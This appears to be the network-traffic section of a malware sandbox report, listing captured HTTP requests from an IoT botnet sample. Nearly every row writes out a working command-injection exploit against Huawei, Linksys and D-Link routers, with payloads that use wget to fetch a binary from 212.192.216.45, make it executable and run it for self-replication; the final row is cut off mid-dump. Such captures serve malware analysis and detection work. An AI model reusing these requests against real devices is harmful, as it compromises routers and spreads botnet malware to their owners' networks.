| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 